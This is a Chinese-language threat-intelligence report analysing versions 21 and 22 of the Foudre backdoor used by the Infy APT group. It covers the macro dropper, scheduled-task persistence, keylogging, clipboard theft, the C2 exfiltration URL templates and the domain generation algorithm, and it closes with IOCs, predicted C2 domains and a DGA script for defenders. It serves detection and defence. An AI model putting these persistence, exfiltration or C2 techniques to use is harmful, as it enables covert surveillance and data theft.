美人鱼(Infy)APT组织的归来——使用最新的Foudre后门进行攻击活...

共 13905字,需浏览 28分钟

 ·

2020-11-02 16:21

美人鱼(Infy)APT组织的归来——使用最新的Foudre后门进行攻击活动的分析

本文一共4127字,56张图预计阅读时间13分钟
c39d544e4edc5a04d9e7d65a17c915f0.webp封面

0x00.前言

美人鱼(又称infy,Prince of Persia,Foudre)APT组织其主要针对政府机构进行攻击活动,由unit42以及360威胁情报中心首先于2016年5月进行披露,其最早的攻击活动可以追溯到2010年,并且期间一直没有长时间的间断.该组织背后的来源为中东地区.其使用的后门由于其C2的请求中带有infy的路径,故此被名为infy后门,在2017年,unit42发布报告披露了其使用了更新的后门,名为Foudre。不过其单独披露了版本1和版本2的后门。在2018年,Intezerlab发布报告披露了关于Foudre后门的第八版本.在本次的攻击活动中,我们发现了其使用的第21版本第22版本

本次发现的攻击活动中,Gcow安全团队追影小组以及微步情报局共同发现并且分析了该活动,其使用了带有恶意宏的文档并且使用了新版本的Foudre后门,其更新了后门的一些操作.同时保留了相关的域生成算法以及部分C2的请求参数具有一定的重合度.并且介于其一直通过在文档中嵌入ole对象通过社工的方式诱导受害者运行使用带有恶意宏提取嵌入的ole对象并且执行的方式释放并运行其打包WinSFX文档以执行相应的Foudre后门,故此撰写本报告以便于看官对该组织更加的了解

根据样本的针对性我们判断其很可能属于中东的威胁演员,并且很大概率属于伊朗

0x01.样本分析

样本为doc文档,诱饵文档中的内容由波斯语的图片组成,带有宏代码,运行后进程链无其他新进程产生

7f912c4445266c60e5a32e056734ffd4.webp图片1 文档内容截图4e81f3b704ac28c8d0ad668bbcae764f.webp图片2 文字内容截图49d58e67082289eaff97b2b6d4f39545.webp图片3 文字内容翻译

文档中插入了几张InlineShape的图片

40b42f35450b5e9c2e5448ce02e02c7c.webp图片4 嵌入的InlineShape的图片

宏代码运行时,遍历插入的几张图片,遍历到Type属性为“wdInlineShapeEmbeddedOLEObject”的图片

fad7209e74809f5cc38bc65a3184c985.webp图片5 宏代码提取相应属性图片

拼接出路径,根据版本不同释放到"C:\\Users\\sam\\AppData\\Local\\Temp\\upxuppos\\fwupdate.tmp"或"C:\\Users\\sam\\AppData\\Local\\Temp\\fwupdate.tmp",并将.tmp后缀修改为.temp

532964cb78f00075b17b009fb777ad9f.webp图片6 根据不同版本释放恶意ole对象并且修改其后缀

利用range.copy将图片拷贝到剪贴板,利用Shell.Applocation执行,在文档关闭时,样本会使用策略绕过Avast执行文件,然后清除掉粘贴板中的内容

ed5d3578a01d6be36775be52a40d63eb.webp图片7 使用shell执行释放的恶意ole对象

fwupdate.tmp

fwupdate.tmp为一个自解压程序,压缩包大小仅为900K,解压后的文件200MB+,文件内容中含有大量重复内容

压缩包调用rundll32加载dll

9cdab8bf667da7dfe017c4264d47dd88.webp图片8 自解压命令

conf4389.dll

从1-110数字中取随机数,取出后根据随机数随机取出一个DLL名称

b9bb4cb70db854b2bdea3d78712c4106.webp图片9 取随机数并且获取dll名称

DLL名称由样本写在内存中

695abf0b4965392741175a4f100ce2d9.webp图片10 dll文件名称

列表共计110行,全部取出后整理得下表,全都为系统白dll名称

"ActivationManager""ActiveSyncProvider""AdaptiveCards""ACPBackgroundManagerPolicy""APHostService""ApiSetHost.AppExecutionAlias""AppidPolicyConverter""AppIdPolicyEngineApi""ApplicationControlCSP""ApplicationFrame""ApplicationFrameHost""ApplySettingsTemplateCatalog""AppManagementConfiguration""AppointmentActivation""AppointmentApis""AppvClientEventLog""AppVEntStreamingManager""AppVEntSubsystems64""AppVEntVirtualization""AppVFileSystemMetadata""AppVIntegration""AppVManifest""AppVSentinel""AppVStreamingUX""AppVStreamMap""AppxApplicabilityEngine""AppXDeploymentClient""AppxPackaging""AssignedAccessManager""AssignedAccessRuntime""AuditPolicyGPInterop""AuthFWSnapin""AzureSettingSyncProvider""BackgroundMediaPolicy""BthAvrcpAppSvc""BthMtpContextHandler""BWContextHandler""CapabilityAccessHandlers""CapabilityAccessManager""CapabilityAccessManagerClient""CashDrawerProtocolProvider""CloudExperienceHost""CloudExperienceHostBroker""CloudExperienceHostCommon""CloudExperienceHostUser""ComposerFramework""ComputeStorage""ConfigureExpandedStorage""ConsentExperienceCommon""CoreShellExtFramework""CoreUIComponents""CourtesyEngine""DataUsageHandlers""DavSyncProvider""DdcComImplementationsDesktop""DeveloperOptionsSettingsHandlers""DeviceCredential""DeviceDirectoryClient""DeviceFlows.DataModel""DeviceMetadataRetrievalClient""DevicePairingExperienceMEM""DeviceSetupStatusProvider""DevicesFlowBroker""DiagnosticsHub.Packaging""DictationManager""DispBroker.Desktop""DmApiSetExtImplDesktop""Docking.VirtualInput""EAMProgressHandler""EasPolicyManagerBrokerPS""EditionUpgradeManagerObj""EnterpriseAppMgmtSvc""EnterpriseAppMgmtClient""EnterpriseDesktopAppMgmtCSP""EnterpriseModernAppMgmtCSP""ETWCoreUIComponentsResources""FaceBootstrapAdapter""FlashUtil_ActiveX""GenericProvider""HolographicExtensions""HolographicRuntimes""IndexedDbLegacy""IpNatHlpClient""KeywordDetectorMsftSidAdapter""LangCleanupSysprepAction""LanguageComponentsInstaller""LanguageOverlayServer""LanguageOverlayUtil""LanguagePackDiskCleanup""LicensingWinRT""LicensingDiagSpp""LocationFrameworkInternalPS""MapControlStringsRes""MapsMigPlugin""MCCSEngineShared""MediaFoundation.DefaultPerceptionProvider""MessagingDataModel2""MetroIntelGenericUIFramework""MFCaptureEngine""MiracastInputMgr""MitigationConfiguration""MixedRealityCapture.Pipeline""MixedRealityRuntime""MSAProfileNotificationHandler""MsSpellCheckingFacility""MTFSpellcheckDS""NetCellcoreCellManagerProviderResources""NetEventPacketCapture""NetworkBindingEngineMigPlugin""NFCProvisioningPlugin"

本次生成的是AuthFWSnapin.dll,在运行的时候其会从中随机抽选

将一同释放出的d488移动到C:\\ProgramData目录下命名为"AuthFWSnapin.dll"并设置为"NORMAL"属性

96197cf07c49cc7c0558ed374fa237cf.webp图片11 移动d488

创建计划任务,在每次登陆时运行

3223c04b2a98e44584e2d06d336e3894.webp图片12 初始化计划任务xml4a2180af4d371efcb1cfb5be8011e19b.webp图片13 使用schtask加载xml注册服务

AuthFWSnapin.dll

通过利用Rundll32.exe加载Shell32.dll,在DLL中main函数内再利用Rundll32.exe加载运行“f8757”导出函数

e7fc0d747d1a721c9f35cc9becbc6855.webp图片14 使用rundll32.exe加载导出函数f8757

检测窗口"NRV3B19"

c252b2936d9630eb1c7d39fa62484d77.webp图片15 检测窗口NRV3B19

样本中还会将一串UNICODE字符串拷贝到变量中,但在执行过程中不知道有何用处

030ffc18f229226a68297c48e1debb2a.webp图片16 拷贝一串字符串到变量df9c3d8d7ba42904b3ddb206152bdfc7.webp图片17 这段unicode字符的翻译

从注册表"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders"下APPDATA查询到%APPDATA%路径

51ce83ab0b63c4f7d931cb9041fcac1d.webp图片18 通过注册表获取AppData的路径-130f3bd495ad5cdbc07b13e845d732369.webp图片19 通过注册表获取AppData路径-2

检查%APPDATA%是否存在,不存在则创建,然后在%APPDATA%下拼接出样本要释放的文件路径

ecef374566f016952e3b40fc207d5436.webp图片20 检查AppData是否存在以及拼接路径

获取API地址

49fbb03965be3f77214350227ad50bfc.webp图片21 获取API地址

遍历进程,查询进程“dfserv.exe

c938132b1b0fb833fe1301a51bd3ae2e.webp图片22 查询进程dfserv.exe

注册了一个窗口类,类名为“NRV3B91”,并创建一个窗口"Form100022",使用名为"Form100022"的窗口进行键盘记录

d0fa0c38b6c5caa2bf3160d65eb166bf.webp图片23 注册窗口类NRV3B912f9790d967bd90bb935ddbfffc385946.webp图片24 创建窗口并进行键盘记录

获取到HTTPUser-AgentGoogle域名

375645efb2dbe09bc5764a2c8899bddb.webp图片25 获取Google域名的User-Agent

获取到本机的计算机名、用户名、IP地址信息

c1744fa285b28bf7e2c683afecfa8b34.webp图片26 收集本机计算机名,用户名,IP地址信息

创建两个定时器,一个每隔10S读取一次剪贴板内容,一个每隔300s链接C2发送窃取的信息

0bdc3fed430e16ebf2712f3f6de1685e.webp图片27 设置定时器用于读取剪切板内容以及向C2发送信息

%APPDATA%目录下创建config.xml用作“Project INI”,存放一串数字ID

b1fdf4222dadf70ddf8d0c6cb838eb45.webp图片28 写入数字ID于config.xml下

Google建立链接,查询状态码是否为200

6fddf1e98d00091f641ee0d748901aef.webp图片29 对Google请求判断其状态码

链接成功后,在%temp%目录下创建一个“tempupd6.exe”,向其中写入的内容为HTTP请求返回的内容,写入之后很快又将文件删除了

963ae4b7f946a36780681f53e159089e.webp图片30 向临时目录下写tempupd6.exe并删除

域名使用生成算法生成

ToHex(CRC32("NRV1"+++周号))+(".space"|".net"|".top"|".dynu.net")

使用lockbox3 Delphi库来验证C2,从C2下载签名文件:

http://[Domain]/de/?d=2020301&v=00022&t=2020%2D10%2D27%2D%2D15%2D47%2D28

其中d 代表 {year} {自年初以来的天数} t 代表 当前时间

下载的签名文件%appdata%\\sig.tmp使用公钥解密后与明文%appdata%\\dom.tmp比较是否相对应

86a4da7b0f79f8b1f8a5ad0f427afdf3.webp图片31 使用公钥解密下载的签名文件

当生成的域名链接不成功时,尝试生成其他域名进行重试

4185a2e53b31776aaf3f31b4079c2f45.webp图片32 使用多种后缀的域名进行请求

验证C2后,与C2通信发送请求检查更新

http:///2014/?c=<计算机名>&u=<用户名>&v =<版本>&s =<密码>&f=<文件夹>&mi=&b=<32/64bit>&t=
b5c23e6bd9f20adfb3fcb3c78c308b80.webp图片33 与C2通信检查更新

将更新下载回的木马保存在%temp%\\tempupd6.exe

062505a7133df4c87778a98d18eaa4d0.webp图片34 将更新下载的木马存在临时目录下的tempupd6.exe中

更新木马下载成功后会再次下载签名文件进行验证,保存在%temp%\\gtsdci32.tmp

http:///2015/?c=<计算机名>&u=<用户名>&v=<版本>&s=<密码>&f=<文件夹>&mi=&b=<32/64bit>&t=
084c04228993dca245bfa71fad314acd.webp图片35 向C2请求验证其下载的更新文件

验证成功后,使用WinExec函数执行新下载回来的木马文件

ed7b314f6c8413e25d5b2dc2275b4fd0.webp图片36 验证成功后使用winexec执行木马文件

还会向C2传回加密后的键盘记录情况

http:///en/d=,text=

后续的载荷并没有下载下来故此不能继续分析

上文中我们根据其C2通信的特征将其命名为V22

此外我们还发现了另外一个与之有相似宏代码的恶意文档,根据与C2通信的特征将版本命名为V21

V21样本中诱饵使用的文档截图:

37de5c5194b7ea99f9b478c583f11017.webp图片37 FoudreV21版本后门文档截图

诱饵文档为带有宏代码的恶意文档,文档中的内容为波斯语

dcae276131bc886a59179d91721e5210.webp图片38 诱饵文档内容翻译

与前面的样本一样,插入的图片同样是InlineShape属性,将其释放到%temp%目录下并调用Shell运行,释放的是一个自解压文件

71b7469579927c14c0983f2c5717aeb8.webp图片39 释放的自解压文档EZUpdate.tmp

EZUpdate.tmp

EZUpdate.tmp是一个自解压文件,其中包含一个.bmp文件,一个.dll文件,一个d3d9

执行的命令行为:Setup=rundll32.exe conf3234.dll f8753 d948

ef5d755d18e611d32349871089ef24e3.webp图片40 自解压命令

conf3234.dll

在conf3234.dll中也有一段意义不明的字符串

324a07af3cfb0df64b945288b4d17a80.webp图片40 内置的意义不明字符串

通过文档内容来看,该样本可能于2020/07/29号后进行编译的

查找窗口"NRV3B19","NRV3B19"是样本最后一阶段注册的窗口类

feb6eaa4657db3149964fc8cbeac22a8.webp图片41 查找窗口NRV3B19

修改注册表,在HKEY_CURRENT_USER\\Software\\temp下写入一个名为“ran2”的注册表,注册表内DLL名称为上文所提及生成的

4dd88a7942ef792f21e87ee45a307a62.webp图片42 将生成额dll名称写入注册表

查询C:\\Programdata是否存在,不存在则创建

3cb8a6a5ad3752c3b768f908ce7dcb95.webp图片43 检查路径是否㛮

将最初同一个压缩包的d389移动到C:\\ProgramData\\下,文件名为注册表内写入的DLL名

81962f10be33b4b9816b3842b6adcae8.webp图片44 移动d389

创建计划任务,实现持久化,自启的方式依然是利用Rundll32调用Shell32.dll的函数执行DLL中的main函数,在main函数中再利用Rundll32调用导出函数

6acf8d0a9250f82454b46800627da18f.webp图片45 初始化计划任务xmlf36d10df032bdbed90c3801f70b449c5.webp图片46 使用schtask注册计划任务

AppxApplicabilityEngine.dll

2fa749e6e9dfa0854ba9aa0a50c0168a.webp图片47 执行f8755函数

检测参数"1281020996"

1311437349093aa7229a5928cd8e29bc.webp图片48 检测参数

注册窗口类“NRV3B19”,并创建一个窗口"Form100021",使用名为"Form100021"的窗口进行键盘记录,与V22版本不同,V22的窗口为"Form100022",样本习惯使用版本号作为窗口名称的结尾

6982c66099e5de5b181a450bce0d903d.webp图片49 注册窗口类NRV3B19c8d504743c733ae1abcc6756e4ecf544.webp图片50 创建窗口以进行键盘记录

V21中的域名生成算法与V22版本相同,使用的域名也相同

域名算法中依然由"NRV1"+年+月+周组成

62888d4a77b9c7884abfe765090f538f.webp图片51 C2域名生成

生成的域名和V22版本样本相同,后缀依然为".space,“.net",".top",".dynu.net"

78633b8be8572cfe4e191d5b7ab99214.webp图片52 与上文一样出现的后缀

两次样本用来解密从C2获得的签名文件的密钥也相同

abe55fda8e93de047fc13e5fdf7166f3.webp图片53 解密验证文件的私钥

两版本样本功能几乎一致,唯一的不同点在于版本号不同,而没有发现其余功能的更新

同时为了方便各位看官理解,我们绘制了该类样本的流程图

9c4006726eb7b3d4cf3804d4c40d22d3.webp图片54 Foudre后门v21V22版本执行流程图

0x02.样本相似以及技术演进

1.样本相似

(1).域名生成算法的相关

从之前的样本去看,从第一版本第22版本都使用了相关的域名生成算法,其中以第八版本为一个分界线

第八版本之前使用了如下的C2域名生成算法:

ToHex(CRC32(“NRV1+++周号))+(“.space”|”.net”|”.top”)

第八版本使用了如下的C2域名生成算法:

ToHex(CRC32(“NRTV1+++周号))+(“.space”|”.net”|”.top”|”.dynu.net”)

而本次活动披露的第21版本第22版本则使用了老的域名生成算法进行生成,同时扩充了新的后缀

ToHex(CRC32("NRV1"+++周号))+(".space"|".net"|".top"|".dynu.net")

在V21与V22版本中更新了添加了验证C2的功能,猜测可能因为之前有安全公司通过算法得到域名后抢在黑客组织前提前抢注了域名

所以导致攻击者添加了验证的环节

(2).C&C报文的URL路径

该组织并没有去费周折修改其样本的C&C的请求报文

http:///2014/?c=<计算机名>&u=<用户名>&v =<版本>&s =<密码>&f=<文件夹>&mi=&b=<32/64bit>&t=http:///2015/?c=<计算机名>&u=<用户名>&v=<版本>&s=<密码>&f=<文件夹>&mi=&b=<32/64bit>&t=

2.样本技术演进

(1).初始植入物的演变

其使用的植入物在前期版本以向PPT文件嵌入多个ole以诱导受害人点击,以及使用可能的水坑攻击,并且使用直接投递伪装成相关诱饵文件的sfx文档进行投递.在本次捕获的样本中主要涉及到使用恶意宏文档进行投递.不过不排除还有其他攻击手段的可能性(注意:不是准确结论,仅为部分猜测)

af7dd8a2eb2ee5a00e7a4ee3bdf5f217.webp图片55 美人鱼(Infy) APT手法的演进

(2).持久化方式的演进

935d99a4bf90f5ecc01fb3ce4940169e.webp图片56 持久化方式演进

0x03.处置建议

删除文件

%Temp%\EZUpdate.tmp

%Temp%\tmp1375\d948

%Temp%\tmp1375\conf3234.dll

%Temp%\tmp1375\61Dk5U6TjDL.bmp

%AppData%\fwupdate.tmp

%AppData%\tmp6073\conf4389.dll

%AppData%\tmp6073\d488

%Appdata%\config.xml

%Temp%\gtsdci32.tmp

%AppData%\sig.tmp

%AppData%\dom.tmp

%Temp%\tempupd6.exe

%Temp%\sduchxll.tmp

0x04.IOCs

MD5

2C111A27D0D9D48E9470264B4C16B472

d497e0332e88341bd5ddbaa326cab977

4381a0c76f2bff772063e6cc6a1ac876

DC14F029EFA635D5922012904E162808

8b8e286f64a4635e12d6d728a5669d51

916e3d4c5835380c99efa802ddb4436d

BE11401B723EC4F20BE8D65C04A8003E

1a46bd6385feae53a6b8aed758e16556

C2

Generating domains for: 2020-10-20 17:19:39.397000 - 2020-12-29 17:19:39.397000. Each domain can have .space, .net,.dynu.net or .top as TLD (top level domain).

1.2020-10-20 17:19:39.397000 - Week Number: 43 e00be33d.space db54a845.space 425df9ff.space 355ac969.space ab3e5cca.space dc396c5c.space 45303de6.space 32370d70.space a28810e1.space d58f2077.space f2b63e96.space 85b10e00.space 1cb85fba.space 6bbf6f2c.space f5dbfa8f.space 82dcca19.space 1bd59ba3.space 6cd2ab35.space fc6db6a4.space 8b6a8632.space2.2020-10-27 17:19:39.397000 - Week Number: 44 7e6f769e.space 94153e82.space 0d1c6f38.space 7a1b5fae.space e47fca0d.space 9378fa9b.space 0a71ab21.space 7d769bb7.space edc98626.space 9aceb6b0.space f7f92813.space 80fe1885.space 19f7493f.space 6ef079a9.space f094ec0a.space 8793dc9c.space 1e9a8d26.space 699dbdb0.space f922a021.space 8e2590b7.space3.2020-11-03 17:19:39.397000 - Week Number: 45 08aa2c3f.space 35b268a6.space acbb391c.space dbbc098a.space 45d89c29.space 32dfacbf.space abd6fd05.space dcd1cd93.space 4c6ed002.space 3b69e094.space cb5b6b94.space bc5c5b02.space 25550ab8.space 52523a2e.space cc36af8d.space bb319f1b.space 2238cea1.space 553ffe37.space c580e3a6.space b287d330.space4.2020-11-10 17:19:39.397000 - Week Number: 46 91a37d85.space 1e9f3b65.space 87966adf.space f0915a49.space 6ef5cfea.space 19f2ff7c.space 80fbaec6.space f7fc9e50.space 674383c1.space 1044b357.space c91dd5cd.space be1ae55b.space 2713b4e1.space 50148477.space ce7011d4.space b9772142.space 207e70f8.space 5779406e.space c7c65dff.space b0c16d69.space5.2020-11-17 17:19:39.397000 - Week Number: 47 e6a44d13.space 07840a24.space 9e8d5b9e.space e98a6b08.space 77eefeab.space 00e9ce3d.space 99e09f87.space eee7af11.space 7e58b280.space 095f8216.space c8dfbffa.space bfd88f6c.space 26d1ded6.space 51d6ee40.space cfb27be3.space b8b54b75.space 21bc1acf.space 56bb2a59.space c60437c8.space b103075e.space6.2020-11-24 17:19:39.397000 - Week Number: 48 761b5082.space 801c16eb.space 19154751.space 6e1277c7.space f076e264.space 8771d2f2.space 1e788348.space 697fb3de.space f9c0ae4f.space 8ec79ed9.space c383f8c7.space b484c851.space 2d8d99eb.space 5a8aa97d.space c4ee3cde.space b3e90c48.space 2ae05df2.space 5de76d64.space cd5870f5.space ba5f4063.space7.2020-12-01 17:19:39.397000 - Week Number: 49 035ade4d.space 8bb28844.space 12bbd9fe.space 65bce968.space fbd87ccb.space 8cdf4c5d.space 15d61de7.space 62d12d71.space f26e30e0.space 85690076.space 85e1e820.space f2e6d8b6.space 6bef890c.space 1ce8b99a.space 828c2c39.space f58b1caf.space 6c824d15.space 1b857d83.space 8b3a6012.space fc3d5084.space8.2020-12-08 17:19:39.397000 - Week Number: 50 639d57a8.space 5bb2593a.space c2bb0880.space b5bc3816.space 2bd8adb5.space 5cdf9d23.space c5d6cc99.space b2d1fc0f.space 226ee19e.space 5569d108.space 328cb4ca.space 458b845c.space dc82d5e6.space ab85e570.space 35e170d3.space 42e64045.space dbef11ff.space ace82169.space 3c573cf8.space 4b500c6e.space9.2020-12-15 17:19:39.397000 - Week Number: 51 149a673e.space 42a9687b.space dba039c1.space aca70957.space 32c39cf4.space 45c4ac62.space dccdfdd8.space abcacd4e.space 3b75d0df.space 4c72e049.space 334edefd.space 4449ee6b.space dd40bfd1.space aa478f47.space 34231ae4.space 43242a72.space da2d7bc8.space ad2a4b5e.space 3d9556cf.space 4a926659.space10.2020-12-22 17:19:39.397000 - Week Number: 52 8d933684.space 69843bb8.space f08d6a02.space 878a5a94.space 19eecf37.space 6ee9ffa1.space f7e0ae1b.space 80e79e8d.space 1058831c.space 675fb38a.space 310860a4.space 460f5032.space df060188.space a801311e.space 3665a4bd.space 4162942b.space d86bc591.space af6cf507.space 3fd3e896.space 48d4d800.space

0x05.附录

参考链接:

https://www.intezer.com/blog/research/prince-of-persia-the-sands-of-foudre/

https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/

http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/

http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/

https://unit42.paloaltonetworks.com/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/

https://www.freebuf.com/articles/network/105726.html

域名生成脚本

基于Esmid idrizovic的脚本进行修改:

import binasciiimport datetimeamp =0xffffffffdef getHostCRC(input):    crc = binascii.crc32(input)&0xffffffff    host ="{:08x}".format(int(crc))return hostdef getDomains(date):    domains =[".space"]    results =[]    weeknumber = date.isocalendar()[1]    s ="NRV1{}{}{}".format(date.year, date.month, weeknumber)    hostname = s    host = getHostCRC(hostname)+ domains[0]    results.append(host)for d in domains:for i in range(1,101):            hostname = s + str(i)            host = getHostCRC(hostname)+ d            results.append(host)return resultsdef getDomainsForNextWeeks(number_of_weeks):    date = datetime.datetime.now()    date -= datetime.timedelta(days=7)    n =1    date_to = date + datetime.timedelta(days=7*number_of_weeks)print"Generating domains for: {} - {}.\nEach domain can have .space, .net or .top as TLD (top level domain).\n\n".format(date, date_to)for i in range(number_of_weeks):        tmp = getDomains(date)        top_domains = tmp[:20]        weeknumber = date.isocalendar()[1]print"{}. {} - Week Number: {}".format(n, date, weeknumber)for domain in top_domains:print"{}".format(domain)        date += datetime.timedelta(days=7)        n = n +1print""getDomainsForNextWeeks(10)

0x06.结语

美人鱼(Infy) APT组织是一个活动持续将近10年的组织,其水平不高也不算低.其不断改变手法以逃避安全人员的追查,同时该组织在其恶意样本的编写中逐渐尝试减少特征,并且在编写过程中使用寄存器传递参数的方式加大安全分析人员分析的难度以及归属的难度.并且很有意思的一点,该组织喜欢在其样本中添加最近新闻中的信息,目的不明,猜测可能旨在标记时间


浏览 92
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报
评论
图片
表情
推荐
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报